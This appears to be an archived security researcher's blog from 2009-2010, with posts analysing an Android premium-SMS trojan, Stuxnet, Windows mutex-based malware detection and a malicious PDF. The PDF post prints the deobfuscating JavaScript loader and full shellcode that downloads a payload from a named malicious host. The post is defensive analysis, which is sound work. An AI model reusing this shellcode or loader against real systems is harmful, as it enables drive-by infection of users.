Jaime Blasco Blog


Analysis of Trojan-SMS.AndroidOS.FakePlayer.a
Tue, 10 Aug 2010

Trojan-SMS.AndroidOS.FakePlayer.a is one of the first malicious programs detected on Android Smartphones.

The program camouflages itself to look like a media player application and begins sending SMS to premium numbers without the user's knowledge.

To analyze the .APK android file we can use the android-apktool (http://code.google.com/p/android-apktool/) to decode the application resources and study the program behaviour.

Let's start decoding the resources with apktool:

pc201166154132:fakeplayer jaimeblasco$ apktool d RU.apk 
I: Baksmaling...
I: Loading resource table...
I: Decoding resources...
I: Loading resource table from file: /Users/jaimeblasco/apktool/framework/1.apk
I: Copying assets and libs...

Apktool obtains the following files from the APK:

pc201166154132:fakeplayer jaimeblasco$ find ./
./
.//RU
.//RU/AndroidManifest.xml
.//RU/apktool.yml
.//RU/res
.//RU/res/drawable
.//RU/res/drawable/icon.png
.//RU/res/layout
.//RU/res/layout/main.xml
.//RU/res/values
.//RU/res/values/public.xml
.//RU/res/values/strings.xml
.//RU/smali
.//RU/smali/org
.//RU/smali/org/me
.//RU/smali/org/me/androidapplication1
.//RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali
.//RU/smali/org/me/androidapplication1/DataHelper.smali
.//RU/smali/org/me/androidapplication1/HelloWorld.smali
.//RU/smali/org/me/androidapplication1/MoviePlayer.smali
.//RU/smali/org/me/androidapplication1/R$attr.smali
.//RU/smali/org/me/androidapplication1/R$drawable.smali
.//RU/smali/org/me/androidapplication1/R$layout.smali
.//RU/smali/org/me/androidapplication1/R$string.smali
.//RU/smali/org/me/androidapplication1/R.smali

If we open the file RU/AndroidManifest.xml we can see that the application requests the permission android.permission.SEND_SMS when it is installed.


<?xml version="1.0" encoding="UTF-8"?>
<manifest package="org.me.androidapplication1"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:icon="@drawable/icon">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS" />
</manifest>

We observe that the application does some SQLite operations on /RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali:


# static fields
.field private static final DATABASE_NAME:Ljava/lang/String; = "movieplayer.db"

.field private static final DATABASE_VERSION:I = 0x1

.field private static final INSERT:Ljava/lang/String; = "insert into table1(was) values (\'was\')"

.field private static final TABLE_NAME:Ljava/lang/String; = "table1"

The interesting operations can be found in RU/smali/org/me/androidapplication1/HelloWorld.smali:

    .line 28
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 29
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 31
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    .line 37
    :goto_0
    const-string v1, "3354"

    .line 39
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1

The application uses the sendTextMessage function from the Android API:


public final void  sendTextMessage  (String destinationAddress, String scAddress, String text, PendingIntent sentIntent, PendingIntent deliveryIntent)  

So, the malicious program tries to send SMS messages to destination 798657 using the service center addresses (SMSC) 3353 and 3354.
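As an added example (my code, not part of the original post), the following Python script resolves the arguments of each sendTextMessage call in the smali listing above. It tracks const-string and const/4 loads into registers and maps the operands of invoke-virtual/range onto the parameter order of the signature quoted above: v0 is the SmsManager instance, and v1 to v5 are destinationAddress, scAddress, text, sentIntent and deliveryIntent. The input is the listing from this post, embedded as a string; nothing beyond what the listing shows is assumed.

```python
import re

# The HelloWorld.smali excerpt from the post, as apktool emitted it. The .local
# annotations name the registers (v1 = destination, v3 = text).
SMALI = """
    .line 28
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"
    .line 29
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"
    .line 31
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0
    const/4 v4, 0x0
    const/4 v5, 0x0
    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
    .line 37
    :goto_0
    const-string v1, "3354"
    .line 39
    const/4 v2, 0x0
    const/4 v4, 0x0
    const/4 v5, 0x0
    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
"""

# Parameter names of SmsManager.sendTextMessage in declaration order, taken from the
# Android API signature quoted in the post. Register v0 holds "this", so the
# remaining registers of the range map onto these in order.
PARAMS = ["destinationAddress", "scAddress", "text", "sentIntent", "deliveryIntent"]

CONST_STRING = re.compile(r'^\s*const-string\s+(v\d+),\s*"((?:[^"\\]|\\.)*)"')
CONST_4 = re.compile(r'^\s*const/4\s+(v\d+),\s*(0x[0-9a-fA-F]+|\d+)')
INVOKE_RANGE = re.compile(
    r'^\s*invoke-virtual/range\s+\{(v\d+)\s*\.\.\s*(v\d+)\},\s*(\S+?)->(\w+)\(')


def find_sms_calls(smali: str) -> list:
    """Walk the method linearly, remembering the last constant loaded into each
    register, and snapshot the register values at every sendTextMessage call."""
    regs, calls = {}, []
    for line in smali.splitlines():
        m = CONST_STRING.match(line)
        if m:
            regs[m.group(1)] = m.group(2)
            continue
        m = CONST_4.match(line)
        if m:
            value = int(m.group(2), 0)
            regs[m.group(1)] = None if value == 0 else value   # 0x0 in an object register is null
            continue
        m = INVOKE_RANGE.match(line)
        if m and m.group(3) == "Landroid/telephony/SmsManager;" and m.group(4) == "sendTextMessage":
            first, last = int(m.group(1)[1:]), int(m.group(2)[1:])
            arg_regs = [f"v{i}" for i in range(first + 1, last + 1)]  # skip v0 ("this")
            calls.append(dict(zip(PARAMS, (regs.get(r) for r in arg_regs))))
    return calls


if __name__ == "__main__":
    for call in find_sms_calls(SMALI):
        print(call)
```

    Running it yields two calls. In both, destinationAddress is the value of the register the listing annotates as destination (v1, "3353" and then "3354"), text is the register annotated text (v3, "798657"), and scAddress plus both PendingIntents are null (const/4 0x0), which in the Android API means the default SMSC is used. The same register tracking is a quick triage step for any app that requests SEND_SMS.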

As we can see, this is a very simple piece of malware with no spreading capabilities, so the risk is low, all the more because it was never on the Android Market.

posted at: 19:30 | path: /Malware | permanent link to this entry | 1 comments |



Scada: New threat targets critical infrastructure systems
Mon, 26 Jul 2010

A new malware called Stuxnet is currently targeting Scada systems. This could be one of the thousands of pieces of malware used by criminals but I want to emphasize some of the characteristics that make this attempt important enough to think over.


  • The malware is designed specifically to attack Siemens WinCC systems. This software controls and monitors industrial processes such as water treatment, gas pipelines, electrical distribution systems and so on. The malware takes advantage of default system credentials and seems to steal schematic information. (http://www.securityfocus.com/bid/41753)

  • Stuxnet uses a previously unknown vulnerability that affects the current versions of Windows. The vulnerability is in the Windows Shell, which parses shortcuts incorrectly, allowing malicious code to run when the icon is displayed. This can be exploited through USB drives or network shares. (POC: http://www.exploit-db.com/exploits/14403/)

  • The drivers dropped by the malware are signed with a digital certificate belonging to Realtek so we can assume that the malware authors gained access to Realtek's private key.

  • A high number of infections have been reported in Iran, Indonesia, India, Azerbaijan and the United States. Coincidence?

  • Who is behind Stuxnet? Anyway, this is a successful attempt to attack high-value assets around the world, and whoever did this is highly skilled, well funded and possibly motivated by political, economic or military reasons.

    posted at: 13:02 | path: /Scada Security | permanent link to this entry | 0 comments |



    Malware: Troyak-AS and Peer activity
    Sun, 14 Mar 2010

    Last week Troyak-AS was taken offline. The number of Zeus C&C servers has been decreasing steeply because of the coordinated operation.

    Here you can find a list of AS50215 Troyak-as peers that make up the neighborhood of one of the most active cybercrime networks.

    I want to share with you some graphs of these peers that show the malicious activity of some of the ASs involved in this network during Q1 of 2010.

    The data has been extracted from one of Alienvault sandnets.


    [Graphs omitted: malicious activity during Q1 2010 for AS-42229 MARIAM-AS PP Mariam, AS-44107 PROMBUDDETAL-AS Prombuddetal LLC, AS-47560 VESTEH-NET-as Vesteh LLC, AS-50369 VISHCLUB-as Kanyovskiy Andriy, AS-5577 ROOT SA and AS-8342 RTCOMM-AS RTComm.RU Autonomous System]

    posted at: 21:29 | path: /Malware | permanent link to this entry | 3 comments | malware, visualization, Zeus, Botnet



    Attacks: Wireless Intrusion Detection Systems Testing Tool
    Thu, 07 Jan 2010

    To celebrate the New Year I want to share with you a simple but useful tool I wrote some time ago.

    The script generates wireless packets to emulate wireless attacks with the intention of testing wireless intrusion detection systems.

    At this moment it supports the following attacks:

  • Sends Probe-response packets with an SSID IE tag component of length 0 (WVE-2006-0064)
  • Floods the WLAN with disassociation packets. (WVE-2005-0046)
  • Floods the WLAN with deauthentication packets. (WVE-2005-0045)
  • Sends an invalid deauthentication reason code
  • Sends an over-sized SSID. (WVE-2006-0071, WVE-2007-0001)
  • Sends an airjack beacon packet. (WVE-2005-0018)
  • Sends an invalid channel number in beacon frames (WVE-2006-0050)
  • Windows XP SP1 behaviour

    To run the tool you need Scapy.

    • Source Code



    You can use the tool to test that your Ossim wireless sensor with Kismet works as you expect:


    posted at: 19:48 | path: /Attacks | permanent link to this entry | 0 comments | wireless ids,wids,attacks,wireless security, wireless attacks, wve, Wireless Vulnerabilities and Exploits



    General: Exploring Windows Objects ACL's
    Tue, 29 Dec 2009

    In the last post, we talked about mutex objects and how to enumerate them. Today we'll learn how to check mutex access lists from WinDBG as well as from user mode, extending the EnumerateMutex example.

    Let's see an example using WinDBG. First query the "\BaseNamedObjects" directory that usually contains mutex objects:

    lkd> !object \BaseNamedObjects
    Object: e18ce788  Type: (823ed418) Directory
        ObjectHeader: e18ce770 (old version)
        HandleCount: 71  PointerCount: 593
        Directory Object: e1001150  Name: BaseNamedObjects
    
        Hash Address  Type          Name
        ---- -------  ----          ----
         00  e15a8880 SymbolicLink  Local
             81e996d0 Event         userenv: Machine Group Policy has been applied
             82286598 Mutant        SHIMLIB_LOG_MUTEX
             82308700 Mutant        ZonesCacheCounterMutex
             e1dfe298 Section       CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-412668190-839522115-500
             817e3ea0 Timer         userenv: refresh timer for 1048:768
             e1f12ed8 Section       MSCTF.MarshalInterface.FileMap.MPJ.DI.HDGDJDJ
             813f90d0 Event         CorDBIPCLSEventReadName_5752
             e25994a8 Section       Cor_Private_IPCBlock_4760
             e2319518 Section       Cor_Private_IPCBlock_4448
             e1fc1818 Section       MSCTF.MarshalInterface.FileMap.ILD.FOB.FNOEBJE
             8231e468 Event         userenv: machine policy force refresh event
             82196f50 Event         jjCSCSessEvent_UM_KM_0
             82111148 Event         AgentToWkssvcEvent
    

    Now query one of them:

    lkd> !object \BaseNamedObjects\SHIMLIB_LOG_MUTEX
    Object: 82286598  Type: (823c55e0) Mutant
        ObjectHeader: 82286580 (old version)
        HandleCount: 8  PointerCount: 9
        Directory Object: e18ce788  Name: SHIMLIB_LOG_MUTEX
    

    And query the object header at 82286580:

    lkd> dt nt!_OBJECT_HEADER  82286580
       +0x000 PointerCount     : 9
       +0x004 HandleCount      : 8
       +0x004 NextToFree       : 0x00000008 
       +0x008 Type             : 0x823c55e0 _OBJECT_TYPE
       +0x00c NameInfoOffset   : 0x10 ''
       +0x00d HandleInfoOffset : 0 ''
       +0x00e QuotaInfoOffset  : 0 ''
       +0x00f Flags            : 0x20 ' '
       +0x010 ObjectCreateInfo : 0x8055a000 _OBJECT_CREATE_INFORMATION
       +0x010 QuotaBlockCharged : 0x8055a000 
       +0x014 SecurityDescriptor : 0xe1756a7e 
       +0x018 Body             : _QUAD
    

    The security descriptor pointer is 0xe1756a7e. The kernel keeps a fast-reference count in the low three bits of that pointer, so mask them off to get the real address:

    
    lkd> ?? 0xe1756a7e & ~0x7
    unsigned int 0xe1756a78
    

    And then we can check the information we wanted:

    
    lkd> !sd 0xe1756a78 0
    ->Revision: 0x1
    ->Sbz1    : 0x0
    ->Control : 0x8004
                SE_DACL_PRESENT
                SE_SELF_RELATIVE
    ->Owner   : S-1-5-32-544
    ->Group   : S-1-5-18
    ->Dacl    : 
    ->Dacl    : ->AclRevision: 0x2
    ->Dacl    : ->Sbz1       : 0x0
    ->Dacl    : ->AclSize    : 0x44
    ->Dacl    : ->AceCount   : 0x2
    ->Dacl    : ->Sbz2       : 0x0
    ->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
    ->Dacl    : ->Ace[0]: ->AceFlags: 0x0
    ->Dacl    : ->Ace[0]: ->AceSize: 0x14
    ->Dacl    : ->Ace[0]: ->Mask : 0x001f0001
    ->Dacl    : ->Ace[0]: ->SID: S-1-5-18
    
    ->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
    ->Dacl    : ->Ace[1]: ->AceFlags: 0x0
    ->Dacl    : ->Ace[1]: ->AceSize: 0x18
    ->Dacl    : ->Ace[1]: ->Mask : 0x00120001
    ->Dacl    : ->Ace[1]: ->SID: S-1-5-32-544
    
    ->Sacl    :  is NULL
    

    So now that we know how to check an object ACL via WinDBG, let's take advantage of the .NET classes inside the System.Security.AccessControl namespace to query object ACLs.

    We can query a previously created mutex object via Mutex.OpenExisting method:

    [SecurityPermissionAttribute(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
    public static Mutex OpenExisting(
        string name,
        MutexRights rights
    )
    

    We'll use MutexRights.ReadPermissions to be able to read ACL information and then call Mutex.GetAccessControl to read access control information.

    Here is the EnumerateMutex example extended to print ACL information for the mutexes inside object directories:

    • Source Code
    • Binary

    (Tested on Windows XP SP2 and Windows 7)

    Example:


    This method can be useful to identify weak ACLs that can lead to a local denial of service; see, for example, the Winsock Mutex Vulnerability.

    Regards

    posted at: 17:32 | path: /General | permanent link to this entry | 1 comments |



    Malware: Exploring mutex objects
    Mon, 28 Dec 2009

    A mutex, also called a lock, is a program object commonly used to avoid simultaneous access to a resource, such as a variable.

    It's used in concurrent programming to allow multiple program threads to share the same resource.

    Mutexes are commonly used by malware authors to avoid infecting a system with several instances of the same malware. When the trojan infects a system, the first step is to obtain a handle to a "named" mutex; if that fails, the malware exits.

    The easiest way to check for the presence of a mutex is the CreateMutex function:

    HANDLE WINAPI CreateMutex(
        __in_opt  LPSECURITY_ATTRIBUTES lpMutexAttributes,
        __in      BOOL bInitialOwner,
        __in_opt  LPCTSTR lpName );
    

    This is the same function that malware uses to check whether the system is already infected, so one approach to detect a piece of malware is to try to obtain a handle to the mutex it creates.

    Here is a list of some malware samples (MD5s) and the mutex each one creates:

    60f733d6d0b077e4a668fb49aab44a30, xx464dg433xx16
    fb663100308285afb4debdcab8d67fe2, 6E523163793968624
    47c6313ec393d0c55d57529e2a9a418d, Security Tool
    72631c3c853d706daf1153b3c8fea54f, psec_once
    c37f47c9071eed101a67532e5d412171, YMING
    cdcd59a5fb80808cad7376c001586c6e, 290541776
    6013de3fed84d40bb173ec23f408a67e, mymutsglwork
    62a3f867becfea136aea4ec83a4d9c44, 5BB0650C
    5f33aa0b5660bc932af969301635d818, XGBPPAQHSE
    2e40abf579e4d8d5d1ba7df34d5e507a, _!SHMSFTHISTORY!_
    

    I've uploaded a small .NET console program, using P/Invoke, that takes the name of the mutex to check for.

    • Source Code
    • Binary

    (Tested on Windows XP SP2 and Windows 7)

    Example:


    You can use this small application to quickly check whether a system is compromised if you know the name of the mutex created by the malware.

    In the previous post, we talked about the Windows kernel objects as well as the "object directories".
    We learned how to query a directory using WinDBG and we found that mutexes, like other kernel objects, are present inside directories.
    So now I will explain how to query object directories from user land via NtQueryDirectoryObject to list the mutexes present in the system.

    We will use the functions NtOpenDirectoryObject and NtQueryDirectoryObject:

    NTSTATUS WINAPI NtOpenDirectoryObject(
        __out  PHANDLE DirectoryHandle,
        __in   ACCESS_MASK DesiredAccess,
        __in   POBJECT_ATTRIBUTES ObjectAttributes );

    NTSTATUS WINAPI NtQueryDirectoryObject(
        __in       HANDLE DirectoryHandle,
        __out_opt  PVOID Buffer,
        __in       ULONG Length,
        __in       BOOLEAN ReturnSingleEntry,
        __in       BOOLEAN RestartScan,
        __inout    PULONG Context,
        __out_opt  PULONG ReturnLength );
    

    So the best approach to enumerate the mutex objects is to traverse all the directories beginning with the root directory ("\") and check for "Mutant" objects inside each directory.
    We have to take into account that a directory may contain other directories, so we have to traverse all of them.

    Here is another piece of code to enumerate all the mutexes present in the system:

    • Source Code
    • Binary

    (Tested on Windows XP SP2 and Windows 7)

    Example:


    Remember that Windows objects belong to a namespace and each user session has a different namespace, so you will retrieve different results from different user sessions.

    I was looking at some mutex results and then I found these:

    0x16F:Mutant                   VMwareGuestDnDDataMutex
    0x170:Mutant                   VMwareGuestCopyPasteMutex
    

    I think this is another interesting trick to detect the presence of a system running inside VMware.
    Searching the Internet I found this report from ThreatExpert about a malware called W32.Neshuta that creates exactly the previous two mutexes.
    So the question is whether the malware checks for the presence of VMware with this technique (I bet you a beer) or uses the same mutants to hide and deceive computer users.

    posted at: 19:59 | path: /Malware | permanent link to this entry | 2 comments |



    General: Windows Kernel Objects
    Thu, 24 Dec 2009

    The Windows Kernel offers different resources to developers: Process, Socket, Thread, Mutex...

    A kernel object is a memory block whose structure has different members containing information about the object.
    There are common members across all object types (like the security descriptor), but each object type has its own specific members (like the ID of a Process object).

    Let's begin playing with WinDbg, which can be used to debug Windows in kernel mode.

    The best way to retrieve the list of kernel objects is to query the ObjectTypes directory:

    lkd> !object \ObjectTypes
    Object: e1000110  Type: (823ed418) Directory
        ObjectHeader: e10000f8 (old version)
        HandleCount: 0  PointerCount: 25
        Directory Object: e1001150  Name: ObjectTypes
    
        Hash Address  Type          Name
        ---- -------  ----          ----
         00  823ed418 Type          Directory
         01  823c8ca0 Type          Thread
             823c55e0 Type          Mutant
         03  82335770 Type          FilterCommunicationPort
         05  823b4958 Type          Controller
         07  823ed5e8 Type          Type
             823c4ca0 Type          Profile
             823c5980 Type          Event
         09  823ed248 Type          SymbolicLink
             823c4560 Type          Section
             823c57b0 Type          EventPair
         10  823c4730 Type          Desktop
         11  823c4e70 Type          Timer
         12  823c4900 Type          WindowStation
             823eb040 Type          File
         16  823b45b8 Type          Driver
         18  823ae250 Type          WmiGuid
             823c4ad0 Type          KeyedEvent
         19  823c8040 Type          Token
             823b4788 Type          Device
         20  823c8408 Type          DebugObject
         21  823b43e8 Type          IoCompletion
         22  823c8e70 Type          Process
         24  823b4b28 Type          Adapter
         26  823c18a0 Type          Key
         28  823c8ad0 Type          Job
         31  823ec3d0 Type          WaitablePort
             823ec5a0 Type          Port
         32  823c5410 Type          Callback
         33  82335940 Type          FilterConnectionPort
         34  823c4040 Type          Semaphore
    

    This gives us a list of all the object types managed by the kernel.

    We can get more information about an object type by querying its address:

    lkd> dt _OBJECT_TYPE 823c4900 
    ntdll!_OBJECT_TYPE
       +0x000 Mutex            : _ERESOURCE
       +0x038 TypeList         : _LIST_ENTRY [ 0x823c4938 - 0x823c4938 ]
       +0x040 Name             : _UNICODE_STRING "WindowStation"
       +0x048 DefaultObject    : (null) 
       +0x04c Index            : 0x11
       +0x050 TotalNumberOfObjects : 5
       +0x054 TotalNumberOfHandles : 0x76
       +0x058 HighWaterNumberOfObjects : 5
       +0x05c HighWaterNumberOfHandles : 0x80
       +0x060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
       +0x0ac Key              : 0x646e6957
       +0x0b0 ObjectLocks      : [4] _ERESOURCE
    

    And even more information:

    lkd> dt _OBJECT_TYPE_INITIALIZER 823c55e0 
    ntdll!_OBJECT_TYPE_INITIALIZER
       +0x000 Length           : 0x5690
       +0x002 UseDefaultObject : 0x3c '<'
       +0x003 CaseInsensitive  : 0x82 ''
       +0x004 InvalidAttributes : 0x823c5908
       +0x008 GenericMapping   : _GENERIC_MAPPING
       +0x018 ValidAccessMask  : 0
       +0x01c SecurityRequired : 0 ''
       +0x01d MaintainHandleCount : 0 ''
       +0x01e MaintainTypeList : 0 ''
       +0x020 PoolType         : 0 ( NonPagedPool )
       +0x024 DefaultPagedPoolCharge : 0
       +0x028 DefaultNonPagedPoolCharge : 0
       +0x02c DumpProcedure    : (null) 
       +0x030 OpenProcedure    : (null) 
       +0x034 CloseProcedure   : (null) 
       +0x038 DeleteProcedure  : 0x823c5618     void  +ffffffff823c5618
       +0x03c ParseProcedure   : 0x823c5618     long  +ffffffff823c5618
       +0x040 SecurityProcedure : 0x000e000c     long  +e000c
       +0x044 QueryNameProcedure : 0xe1005498     long  +ffffffffe1005498
       +0x048 OkayToCloseProcedure : (null) 
    

    All the kernel objects are managed by the object manager, which manages all the related resources: kernel data structures, kernel references, user references, synchronization...

    The Windows kernel provides "object directories" to categorize the objects being managed according to their type. For example, we previously queried the ObjectTypes directory to retrieve the list of object types.

    Another example: query the \Driver directory to get the list of drivers present on the system:

    lkd> !object \Driver
    Object: e1023908  Type: (823ed418) Directory
        ObjectHeader: e10238f0 (old version)
        HandleCount: 0  PointerCount: 96
        Directory Object: e1001150  Name: Driver
    
        Hash Address  Type          Name
        ---- -------  ----          ----
         00  823343b0 Driver        NDIS
             82335340 Driver        KSecDD
             82171320 Driver        Beep
         01  8217ef38 Driver        Raspti
             82233260 Driver        Mouclass
             8217dd68 Driver        es1371
         02  82060030 Driver        vmx_svga
    ...
    ...
    

    In the next post I will explain the way to query object directories from user land via NtQueryDirectoryObject [Ntdll.dll] and take advantage of it for incident response and malware detection.

    posted at: 01:24 | path: /General | permanent link to this entry | 0 comments |



    Exploits: Analyzing a malicious PDF Document
    Mon, 21 Dec 2009

    In this post I will explain a real case example of how to manually analyze a malicious PDF document.
    Some days ago I collected a malicious PDF file. Usually Wepawet does an excellent job and automatically analyzes the malicious file for you.
    In this case Wepawet said "No exploits were identified.", so probably the malicious PDF file uses some tricks against automatic analysis.

    We start by collecting some information about the PDF file:

    MD5: 67f3da49ac07e6a5b3be1a743c3ea40d

    Collect some PDF object information to begin the analysis using Didier Stevens' pdfid.py:

    mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php 
    PDFiD 0.0.9 pdf.php
     PDF Header: %PDF-1.4
     obj                    9
     endobj                 9
     stream                 3
     endstream              3
     xref                   1
     trailer                1
     startxref              1
     /Page                  1
     /Encrypt               0
     /ObjStm                0
     /JS                    1
     /JavaScript            2
     /AA                    0
     /OpenAction            0
     /AcroForm              0
     /JBIG2Decode           0
     /RichMedia             0
     /Colors > 2^24         0
    

    Now we know there are some JavaScript and filter objects we should analyze. First we search for Filter objects inside the PDF using Didier Stevens' pdf-parser.py:

    mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php 
    obj 5 0
     Type: 
     Referencing: 
     Contains stream
     [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]
    
     <<
       /Length 4852 
       /Filter /FlateDecode
     
     >>
    
    obj 6 0
     Type: 
     Referencing: 
     Contains stream
     [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]
    
     <<
       /Length 299 
       /Filter /FlateDecode
     
     >>
    
    

    We have two streams that should be carefully analyzed, let's see the raw data of obj 5 0:

    mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more
    obj 5 0
     Type: 
     Referencing: 
     Contains stream
     
    << /Length 4852 /Filter /FlateDecode
     >>
    
    
     <<
       /Length 4852 
       /Filter /FlateDecode
     
     >>
    
     colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa 
    443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd 
    assa 443562df sdfs
    23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df.........
    ...........
    ...........
    ...........
    

    We have 172K of stream data; we save it for later analysis. Now dump the obj 6 raw data:

    mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more
    obj 6 0
     Type: 
     Referencing: 
     Contains stream
     
    << /Length 299 /Filter /FlateDecode
     >>
    
    
     <<
       /Length 299 
       /Filter /FlateDecode
     
     >>
    
     
    var jxtDqSSfQPmE1 = "";
    
    function cCrqddqiDoTmt(GEoyx8oatAOWi,g7UwbOwqmi0NT,g7UwbOwqmi0NTasd,g7UwbOwqmi0NTbbb)
    {
    var kokk = eval;
    kokk(GEoyx8oatAOWi);
    }
    
    function WGBsiR5aIiD9Q(g7UwbOwqmi0NT,g7UwbOwqmi0NTka,g7UwbOwqmi0NTllol,g7UwbOwqmi0NTbban,g7UwbOwqmi0NTkkkl)
    {
    var uWReX84wKBTnU = "%";
    VDzBdR9Xfzz8e = this.info.title;
    jxtDqSSfQPmE1 = VDzBdR9Xfzz8e.replace(/colkokasd assa 443562df sdfs232342/g,uWReX84wKBTnU);
    eval("var COPC8XTJPCkUm = u"+"nes"+"cape(jxtDqSSfQPmE1);");
    cCrqddqiDoTmt(COPC8XTJPCkUm);
    }
    
    WGBsiR5aIiD9Q();
    

    This is much better: we have some JavaScript with eval and unescape calls and a reference to this.info.title.
    If we inspect info.title we realize it is the obj 5 0 data we extracted.

    As we can see, the JavaScript code replaces "colkokasd assa 443562df sdfs232342" in the obj 5 stream with the variable uWReX84wKBTnU ("%").

    To emulate the JavaScript code, first we dump the obj 5 data and then use sed to replace the marker:

    python pdf-parser.py --object 5 --raw --filter pdf.php > obj5
    sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5
    

    We create a js file with the replaced data inside var JmfNzd7NdGNhf = "%66%75%6e%63%74%69%6f%6.......... " and then call print(unescape(JmfNzd7NdGNhf));.

    If we execute the file with SpiderMonkey:

    mac-jaime:pdf1 jaimeblasco$ js obj_5.js
    

    Download the unobfuscated data from here

    Now we have the unobfuscated JavaScript code. The PPPDDDFF() function checks the Acrobat Reader version using the app.viewerVersion Adobe JavaScript property and exploits a different vulnerability for each of the identified versions:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()

    We also found a shellcode; here is the raw data extracted using SpiderMonkey:

    shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \
                            "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \
                            "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \
                            "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \
                            "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \
                            "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \
                            "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \
                            "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \
                            "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \
                            "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \
                            "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \
                            "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \
                            "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \
                            "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \
                            "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"
    

    The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX), here is the analysis data:

  • VirusTotal
  • ThreatExpert

    posted at: 14:01 | path: /Exploits | permanent link to this entry | 2 comments |



    Ossim: Using Cisco SDEE Protocol to collect security events.
    Thu, 29 Oct 2009

    We added support for collecting events via the Security Device Event Exchange (SDEE) protocol, which lets us capture events from:

  • Cisco Network Prevention Systems (IPS)
